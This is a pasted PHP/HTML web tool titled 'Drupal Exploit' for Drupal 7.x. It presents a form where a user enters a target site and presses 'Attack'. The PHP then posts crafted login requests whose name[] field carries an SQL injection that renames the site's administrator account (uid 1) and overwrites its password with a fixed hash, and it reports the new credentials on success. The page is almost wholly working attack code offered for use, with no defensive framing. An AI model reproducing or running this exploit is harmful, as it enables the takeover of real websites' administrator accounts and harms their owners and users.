SHOW:
|
|
- or go back to the newest paste.
| 1 | <!Doctype HTML> | |
| 2 | <html> | |
| 3 | <head> | |
| 4 | <link rel="shortcut icon" href="http://shopget24.com/images/sampledata/hack-run.png"> | |
| 5 | <title>Drupal Exploit</title> | |
| 6 | <style type="text/css"> | |
| 7 | .mymargin{
| |
| 8 | margin-top:30px; | |
| 9 | color:white; | |
| 10 | font-family: monospace; | |
| 11 | } | |
| 12 | body{
| |
| 13 | background-color:#999; | |
| 14 | } | |
| 15 | a {
| |
| 16 | color: red; | |
| 17 | text-decoration: none; | |
| 18 | } | |
| 19 | h1 {
| |
| 20 | color: #40E1C9 | |
| 21 | } | |
| 22 | h2 {
| |
| 23 | color : #008000; | |
| 24 | } | |
| 25 | </style> | |
| 26 | </head> | |
| 27 | <body> | |
| 28 | <center> | |
| 29 | <img src="http://shopget24.com/images/sampledata/hack-run.png" width="150" height="160"> | |
| 30 | <div class="mymargin"> | |
| 31 | <center> | |
| 32 | <h1>Drupal Exploit</h1> | |
| 33 | <h2>Version 7.x</h2> | |
| 34 | <form method="GET" action=""> | |
| 35 | Site : <input type="text" name="url" placeholder="Example: www.site.com"> | |
| 36 | <input size="50" type="submit" name="submit" value="Attack"> | |
| 37 | </form> | |
| 38 | <br> | |
| 39 | <?php | |
| 40 | ||
| 41 | error_reporting(0); | |
| 42 | if(isset($_GET['submit'])){
| |
| 43 | $log = "/user/login"; | |
| 44 | $url = "http://".$_GET['url']; | |
| 45 | $holako = "/?q=user"; | |
| 46 | $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
| |
| 47 | $params = array( | |
| 48 | 'http' => array( | |
| 49 | 'method' => 'POST', | |
| 50 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 51 | 'content' => $post_data | |
| 52 | ) | |
| 53 | ); | |
| 54 | $ctx = stream_context_create($params); | |
| 55 | $data = file_get_contents($url . '/user/login/', null, $ctx); | |
| 56 | echo "<h3>Testing user/login </h3>"; | |
| 57 | if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
| |
| 58 | echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>";
| |
| 59 | } else {
| |
| 60 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| 61 | } | |
| 62 | } | |
| 63 | ||
| 64 | if(isset($_GET['submit'])){
| |
| 65 | ||
| 66 | $url = "http://".$_GET['url']."/"; | |
| 67 | $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
| |
| 68 | $params = array( | |
| 69 | 'http' => array( | |
| 70 | 'method' => 'POST', | |
| 71 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
| 72 | 'content' => $post_data | |
| 73 | ) | |
| 74 | ); | |
| 75 | $ctx = stream_context_create($params); | |
| 76 | $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
| 77 | echo '<h3>Testing at Index</h3>'; | |
| 78 | if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
| |
| 79 | echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>";
| |
| 80 | } else {
| |
| 81 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
| 82 | } | |
| 83 | } | |
| 84 | ||
| 85 | ?> | |
| 86 | <h3>Developed By <a href="http://fb.com/black4sniperr">black sniper</h3> | |
| 87 | </div> | |
| 88 | </body> | |
| 89 | </html> |
